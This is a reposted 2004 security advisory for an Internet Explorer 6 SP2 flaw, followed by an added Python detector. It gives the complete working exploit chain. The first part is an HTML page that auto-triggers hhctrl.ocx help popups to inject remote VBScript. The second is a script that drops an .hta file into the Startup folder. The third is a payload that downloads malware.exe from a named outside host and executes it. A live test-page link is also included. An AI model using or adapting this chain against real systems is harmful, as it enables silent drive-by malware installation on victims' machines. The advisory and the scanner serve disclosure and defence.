Affected systems:
Microsoft Internet Explorer 6.0SP2
    - Microsoft Windows XP Professional SP2
    - Microsoft Windows XP Home SP2
Description:
Microsoft Internet Explorer is a popular web browser.

By chaining several weaknesses in Microsoft Internet Explorer, including problems in the HTML Help (hhctrl.ocx) ActiveX control, a remote attacker can run an arbitrary file without any user interaction, leading to execution of malicious code.

An attacker can proceed as follows:

1. Build a web page containing the following code:

sp2rc.htm
---------------------------------------------------------------------
<OBJECT id="localpage" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm">
</OBJECT>

<OBJECT id="inject" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:execScript("document.write(\"<script language=\\\"vbscript\\\" src=\\\"http://freehost07.websamba.com/greyhats/writehta.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>

<script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>
---------------------------------------------------------------------

The first object (id: localpage) tells hhctrl.ocx to open a help popup window on C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm. This file is chosen because it is handled in the local (Local Machine) zone. On some machines an error is displayed before the popup appears; this is the user's only chance to stop the exploit from working.

The second object (id: inject) tells the help popup window to navigate to a javascript: URL, which performs cross-site scripting: a script tag writes the remote file into the page, and writehta.txt is then executed in the insecure local zone.

In this script, HHClick is used to automate the exploit so that no click is required.

2. Writehta.txt uses an ADODB recordset to write "Microsoft Office.hta" into the user's Startup folder:

writehta.txt
---------------------------------------------------------------------
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://www.malware.com;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs =CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML
rs.close
conn.close
window.close
---------------------------------------------------------------------

3. f00bar.txt is the file requested by the ADODB recordset. Because there is no absolute restriction on .hta files, the target user is compromised simply by fetching this file and saving it onto their system:

f00bar.txt
---------------------------------------------------------------------
"meaning less shit i had to put here"
"<script language=vbscript> crap = """
""": on error resume next: crap = """
""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
""" : o.open ""GET"",""http://freehost07.websamba.com/greyhats/malware.exe"",False : crap="""
""" : o.send : crap="""
""" : set s = createobject(""adodb.stream"") : crap="""
""" : s.type=1 : crap="""
""" : s.open : crap="""
""" : s.write o.responseBody : crap="""
""" : s.savetofile ""C:\malware.exe"",2 : crap="""
""" : Set ws = CreateObject(""WScript.Shell"") : crap="""
""" : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""
"""</script> crap="""
---------------------------------------------------------------------
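As an added, defender-side example (not part of the original advisory or Paul's code): a small Python scanner that flags HTML using the pattern from step 1, an hhctrl.ocx OBJECT whose Item<n> parameter sends the "Related Topics" help popup to a file:, javascript: or vbscript: URL, plus a script that fires HHClick() so no user click is needed. The sample page, its paths and URLs are constructed placeholders.

```python
from html.parser import HTMLParser
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"  # HTML Help control (hhctrl.ocx)

class HHCtrlParser(HTMLParser):
    """Collects hhctrl.ocx <OBJECT>s with their <PARAM>s, plus inline <script> text."""
    def __init__(self):
        super().__init__()
        self.objects, self.scripts = [], []
        self._obj, self._in_script = None, False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object" and HHCTRL_CLSID in a.get("classid", "").lower():
            self._obj = {"id": a.get("id", ""), "params": {}}
            self.objects.append(self._obj)
        elif tag == "param" and self._obj is not None:
            self._obj["params"][a.get("name", "").lower()] = a.get("value", "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "object":
            self._obj = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def scan_html(html):
    """Returns one finding per suspicious feature of the 'Related Topics' menu trick."""
    p = HHCtrlParser()
    p.feed(html)
    findings = []
    for obj in p.objects:
        for name, value in obj["params"].items():
            # Item<n> = "command;<url>" makes the help popup navigate to <url>
            if name.startswith("item") and value.lower().startswith("command;"):
                scheme = value.split(";", 1)[1].strip().split(":", 1)[0].lower()
                if scheme in ("file", "javascript", "vbscript"):
                    findings.append(f"{obj['id']}: menu item navigates to a {scheme}: URL")
    if any(".hhclick(" in s.lower() for s in p.scripts):
        findings.append("script calls HHClick(): menu fires without a user click")
    return findings

# Constructed sample page (placeholder path and URL, not the advisory's own)
SAMPLE = """<object id="localpage" classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11">
<param name="Item1" value="command;file://C:\\WINDOWS\\placeholder.htm"></object>
<object id="inject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<param name="Item1" value="command;javascript:alert('placeholder')"></object>
<script>localpage.HHClick(); setTimeout("inject.HHClick()", 100);</script>"""
```

Run `scan_html(SAMPLE)` to get one finding per OBJECT plus one for the HHClick() trigger; an OBJECT with any other CLSID produces no finding.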

Test method:

Warning

The following programs (methods) may be offensive in nature and are provided only for security research and teaching. Use at your own risk!

Paul (paul@greyhats.cjb.net) has provided the following test page:

http://freehost07.websamba.com/greyhats/sp2rc.htm

Recommendation:
Vendor patch:

Microsoft
---------
The vendor has not yet released a patch or upgrade; we recommend that users of this software keep watching the vendor's homepage for the latest version:

http://www.microsoft.com/windows/ie/default.asp
posted on 2004-12-28 16:58 by 小辉